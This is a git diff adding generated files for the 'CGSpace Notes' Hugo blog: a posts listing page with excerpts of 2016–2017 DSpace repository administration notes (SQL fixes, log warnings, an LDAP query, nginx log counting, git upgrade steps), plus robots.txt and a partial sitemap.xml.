+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/posts/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Posts"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/posts/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/posts/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/posts/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-02/">February, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-02-07T07:04:52-08:00">Tue Feb 07, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-02-07">2017-02-07</h2>
+<ul>
+<li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;;
+  id   | collection_id | item_id
+-------+---------------+---------
+ 92551 |           313 |   80278
+ 92550 |           313 |   80278
+ 90774 |          1051 |   80278
+(3 rows)
+dspace=# delete from collection2item where id = 92551 and item_id = 80278;
+DELETE 1
+</code></pre><ul>
+<li>Create issue on GitHub to track the addition of CCAFS Phase II project tags (<a href="https://github.com/ilri/DSpace/issues/301">#301</a>)</li>
+<li>Looks like we&rsquo;ll be using <code>cg.identifier.ccafsprojectpii</code> as the field name</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-01/">January, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-01-02T10:43:00+03:00">Mon Jan 02, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-01-02">2017-01-02</h2>
+<ul>
+<li>I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error</li>
+<li>I tested on DSpace Test as well and it doesn&rsquo;t work there either</li>
+<li>I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-12/">December, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-12-02T10:43:00+03:00">Fri Dec 02, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-12-02">2016-12-02</h2>
+<ul>
+<li>CGSpace was down for five hours in the morning while I was sleeping</li>
+<li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li>
+</ul>
+<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+</code></pre><ul>
+<li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li>
+<li>I&rsquo;ve raised a ticket with Atmire to ask</li>
+<li>Another worrying error from dspace.log is:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-11/">November, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-11-01T09:21:00+03:00">Tue Nov 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-11-01">2016-11-01</h2>
+<ul>
+<li>Add <code>dc.type</code> to the output options for Atmire&rsquo;s Listings and Reports module (<a href="https://github.com/ilri/DSpace/pull/286">#286</a>)</li>
+</ul>
+<p><img src="/cgspace-notes/2016/11/listings-and-reports.png" alt="Listings and Reports with output type"></p>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-10/">October, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-10-03T15:53:00+03:00">Mon Oct 03, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-10-03">2016-10-03</h2>
+<ul>
+<li>Testing adding <a href="https://wiki.lyrasis.org/display/DSDOC5x/ORCID+Integration#ORCIDIntegration-EditingexistingitemsusingBatchCSVEditing">ORCIDs to a CSV</a> file for a single item to see if the author orders get messed up</li>
+<li>Need to test the following scenarios to see how author order is affected:
+<ul>
+<li>ORCIDs only</li>
+<li>ORCIDs plus normal authors</li>
+</ul>
+</li>
+<li>I exported a random item&rsquo;s metadata as CSV, deleted <em>all columns</em> except id and collection, and made a new coloum called <code>ORCID:dc.contributor.author</code> with the following random ORCIDs from the ORCID registry:</li>
+</ul>
+<pre tabindex="0"><code>0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-09/">September, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-09-01T15:53:00+03:00">Thu Sep 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-09-01">2016-09-01</h2>
+<ul>
+<li>Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors</li>
+<li>Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure will break our LDAP groups in DSpace</li>
+<li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li>
+<li>It looks like we might be able to use OUs now, instead of DCs:</li>
+</ul>
+<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-08/">August, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-08-01T15:53:00+03:00">Mon Aug 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-08-01">2016-08-01</h2>
+<ul>
+<li>Add updated distribution license from Sisay (<a href="https://github.com/ilri/DSpace/issues/259">#259</a>)</li>
+<li>Play with upgrading Mirage 2 dependencies in <code>bower.json</code> because most are several versions of out date</li>
+<li>Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more</li>
+<li>bower stuff is a dead end, waste of time, too many issues</li>
+<li>Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of <code>fonts</code>)</li>
+<li>Start working on DSpace 5.1 → 5.5 port:</li>
+</ul>
+<pre tabindex="0"><code>$ git checkout -b 55new 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.5
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-07/">July, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-07-01T10:53:00+03:00">Fri Jul 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-07-01">2016-07-01</h2>
+<ul>
+<li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li>
+<li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
+UPDATE 95
+dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
+ text_value
+------------
+(0 rows)
+</code></pre><ul>
+<li>In this case the select query was showing 95 results before the update</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-06/">June, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-06-01T10:53:00+03:00">Wed Jun 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-06-01">2016-06-01</h2>
+<ul>
+<li>Experimenting with IFPRI OAI (we want to harvest their publications)</li>
+<li>After reading the <a href="https://www.oclc.org/support/services/contentdm/help/server-admin-help/oai-support.en.html">ContentDM documentation</a> I found IFPRI&rsquo;s OAI endpoint: <a href="http://ebrary.ifpri.org/oai/oai.php">http://ebrary.ifpri.org/oai/oai.php</a></li>
+<li>After reading the <a href="https://www.openarchives.org/OAI/openarchivesprotocol.html">OAI documentation</a> and testing with an <a href="http://validator.oaipmh.com/">OAI validator</a> I found out how to get their publications</li>
+<li>This is their publications set: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc">http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc</a></li>
+<li>You can see the others by using the OAI <code>ListSets</code> verb: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListSets">http://ebrary.ifpri.org/oai/oai.php?verb=ListSets</a></li>
+<li>Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in <code>dc.identifier.fund</code> to <code>cg.identifier.cpwfproject</code> and then the rest to <code>dc.description.sponsorship</code></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-05/">May, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-05-01T23:06:00+03:00">Sun May 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-05-01">2016-05-01</h2>
+<ul>
+<li>Since yesterday there have been 10,000 REST errors and the site has been unstable again</li>
+<li>I have blocked access to the API now</li>
+<li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li>
+</ul>
+<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log  | uniq | wc -l
+3168
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/8/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/10/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/robots.txt b/docs/robots.txt
new file mode 100644
index 000000000..c96d18e5c
--- /dev/null
+++ b/docs/robots.txt
@@ -0,0 +1,106 @@
+User-agent: *
+
+
+Disallow: /cgspace-notes/categories/
+Disallow: /cgspace-notes/
+Disallow: /cgspace-notes/2023-07/
+Disallow: /cgspace-notes/categories/notes/
+Disallow: /cgspace-notes/posts/
+Disallow: /cgspace-notes/2023-06/
+Disallow: /cgspace-notes/2023-05/
+Disallow: /cgspace-notes/2023-04/
+Disallow: /cgspace-notes/2023-03/
+Disallow: /cgspace-notes/2023-02/
+Disallow: /cgspace-notes/2023-01/
+Disallow: /cgspace-notes/2022-12/
+Disallow: /cgspace-notes/2022-11/
+Disallow: /cgspace-notes/2022-10/
+Disallow: /cgspace-notes/2022-09/
+Disallow: /cgspace-notes/2022-08/
+Disallow: /cgspace-notes/2022-07/
+Disallow: /cgspace-notes/2022-06/
+Disallow: /cgspace-notes/2022-05/
+Disallow: /cgspace-notes/2022-04/
+Disallow: /cgspace-notes/2022-03/
+Disallow: /cgspace-notes/2022-02/
+Disallow: /cgspace-notes/2022-01/
+Disallow: /cgspace-notes/2021-12/
+Disallow: /cgspace-notes/2021-11/
+Disallow: /cgspace-notes/2021-10/
+Disallow: /cgspace-notes/2021-09/
+Disallow: /cgspace-notes/2021-08/
+Disallow: /cgspace-notes/2021-07/
+Disallow: /cgspace-notes/2021-06/
+Disallow: /cgspace-notes/2021-05/
+Disallow: /cgspace-notes/2021-04/
+Disallow: /cgspace-notes/2021-03/
+Disallow: /cgspace-notes/cgspace-cgcorev2-migration/
+Disallow: /cgspace-notes/tags/migration/
+Disallow: /cgspace-notes/tags/
+Disallow: /cgspace-notes/2021-02/
+Disallow: /cgspace-notes/2021-01/
+Disallow: /cgspace-notes/2020-12/
+Disallow: /cgspace-notes/cgspace-dspace6-upgrade/
+Disallow: /cgspace-notes/2020-11/
+Disallow: /cgspace-notes/2020-10/
+Disallow: /cgspace-notes/2020-09/
+Disallow: /cgspace-notes/2020-08/
+Disallow: /cgspace-notes/2020-07/
+Disallow: /cgspace-notes/2020-06/
+Disallow: /cgspace-notes/2020-05/
+Disallow: /cgspace-notes/2020-04/
+Disallow: /cgspace-notes/2020-03/
+Disallow: /cgspace-notes/2020-02/
+Disallow: /cgspace-notes/2020-01/
+Disallow: /cgspace-notes/2019-12/
+Disallow: /cgspace-notes/2019-11/
+Disallow: /cgspace-notes/2019-10/
+Disallow: /cgspace-notes/2019-09/
+Disallow: /cgspace-notes/2019-08/
+Disallow: /cgspace-notes/2019-07/
+Disallow: /cgspace-notes/2019-06/
+Disallow: /cgspace-notes/2019-05/
+Disallow: /cgspace-notes/2019-04/
+Disallow: /cgspace-notes/2019-03/
+Disallow: /cgspace-notes/2019-02/
+Disallow: /cgspace-notes/2019-01/
+Disallow: /cgspace-notes/2018-12/
+Disallow: /cgspace-notes/2018-11/
+Disallow: /cgspace-notes/2018-10/
+Disallow: /cgspace-notes/2018-09/
+Disallow: /cgspace-notes/2018-08/
+Disallow: /cgspace-notes/2018-07/
+Disallow: /cgspace-notes/2018-06/
+Disallow: /cgspace-notes/2018-05/
+Disallow: /cgspace-notes/2018-04/
+Disallow: /cgspace-notes/2018-03/
+Disallow: /cgspace-notes/2018-02/
+Disallow: /cgspace-notes/2018-01/
+Disallow: /cgspace-notes/2017-12/
+Disallow: /cgspace-notes/2017-11/
+Disallow: /cgspace-notes/2017-10/
+Disallow: /cgspace-notes/cgiar-library-migration/
+Disallow: /cgspace-notes/tags/notes/
+Disallow: /cgspace-notes/2017-09/
+Disallow: /cgspace-notes/2017-08/
+Disallow: /cgspace-notes/2017-07/
+Disallow: /cgspace-notes/2017-06/
+Disallow: /cgspace-notes/2017-05/
+Disallow: /cgspace-notes/2017-04/
+Disallow: /cgspace-notes/2017-03/
+Disallow: /cgspace-notes/2017-02/
+Disallow: /cgspace-notes/2017-01/
+Disallow: /cgspace-notes/2016-12/
+Disallow: /cgspace-notes/2016-11/
+Disallow: /cgspace-notes/2016-10/
+Disallow: /cgspace-notes/2016-09/
+Disallow: /cgspace-notes/2016-08/
+Disallow: /cgspace-notes/2016-07/
+Disallow: /cgspace-notes/2016-06/
+Disallow: /cgspace-notes/2016-05/
+Disallow: /cgspace-notes/2016-04/
+Disallow: /cgspace-notes/2016-03/
+Disallow: /cgspace-notes/2016-02/
+Disallow: /cgspace-notes/2016-01/
+Disallow: /cgspace-notes/2015-12/
+Disallow: /cgspace-notes/2015-11/
diff --git a/docs/sitemap.xml b/docs/sitemap.xml
new file mode 100644
index 000000000..79026099f
--- /dev/null
+++ b/docs/sitemap.xml
@@ -0,0 +1,314 @@
+<?xml version="1.0" encoding="utf-8" standalone="yes"?>
+<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
+  xmlns:xhtml="http://www.w3.org/1999/xhtml">
+  <url>
+    <loc>https://alanorth.github.io/cgspace-notes/categories/</loc>
+    <lastmod>2023-07-01T17:17:31+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/</loc>
+    <lastmod>2023-07-01T17:17:31+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2023-07/</loc>
+    <lastmod>2023-07-01T17:17:31+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/categories/notes/</loc>
+    <lastmod>2023-07-01T17:17:31+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/posts/</loc>
+    <lastmod>2023-07-01T17:17:31+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2023-06/</loc>
+    <lastmod>2023-07-01T17:17:31+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2023-05/</loc>
+    <lastmod>2023-05-30T20:19:17+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2023-04/</loc>
+    <lastmod>2023-05-04T14:44:51+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2023-03/</loc>
+    <lastmod>2023-04-02T09:16:25+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2023-02/</loc>
+    <lastmod>2023-03-01T08:30:25+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2023-01/</loc>
+    <lastmod>2023-03-14T14:30:17+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2022-12/</loc>
+    <lastmod>2023-01-01T10:12:13+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2022-11/</loc>
+    <lastmod>2023-01-04T10:53:02+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2022-10/</loc>
+    <lastmod>2023-04-18T11:08:15-07:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2022-09/</loc>
+    <lastmod>2022-09-30T17:29:50+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2022-08/</loc>
+    <lastmod>2023-02-22T11:59:48+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2022-07/</loc>
+    <lastmod>2022-07-31T15:49:35+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2022-06/</loc>
+    <lastmod>2023-04-27T13:10:13-07:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2022-05/</loc>
+    <lastmod>2022-05-30T16:00:02+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2022-04/</loc>
+    <lastmod>2022-05-04T11:09:45+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2022-03/</loc>
+    <lastmod>2022-06-09T09:41:49+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2022-02/</loc>
+    <lastmod>2022-03-01T17:17:27+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2022-01/</loc>
+    <lastmod>2022-05-12T12:51:45+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2021-12/</loc>
+    <lastmod>2022-01-09T10:39:51+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2021-11/</loc>
+    <lastmod>2021-11-30T16:44:30+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2021-10/</loc>
+    <lastmod>2021-11-01T10:48:13+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2021-09/</loc>
+    <lastmod>2021-10-04T11:10:54+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2021-08/</loc>
+    <lastmod>2021-09-02T17:06:28+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2021-07/</loc>
+    <lastmod>2021-08-01T16:19:05+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2021-06/</loc>
+    <lastmod>2021-07-01T08:53:21+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2021-05/</loc>
+    <lastmod>2021-07-06T17:03:55+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2021-04/</loc>
+    <lastmod>2021-04-28T18:57:48+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2021-03/</loc>
+    <lastmod>2021-04-13T21:13:08+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/</loc>
+    <lastmod>2021-09-21T12:46:34+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/tags/migration/</loc>
+    <lastmod>2021-09-21T12:46:34+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/tags/</loc>
+    <lastmod>2021-09-21T12:46:34+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2021-02/</loc>
+    <lastmod>2021-08-08T17:07:54+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2021-01/</loc>
+    <lastmod>2021-01-31T16:32:16+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2020-12/</loc>
+    <lastmod>2021-01-04T20:09:02+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/</loc>
+    <lastmod>2020-12-01T19:15:48+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2020-11/</loc>
+    <lastmod>2020-11-30T20:12:55+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2020-10/</loc>
+    <lastmod>2020-11-16T10:53:45+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2020-09/</loc>
+    <lastmod>2020-10-01T10:47:40+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2020-08/</loc>
+    <lastmod>2020-09-02T13:39:11+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2020-07/</loc>
+    <lastmod>2020-08-02T22:14:16+03:00</lastmod>
+  </url><url>
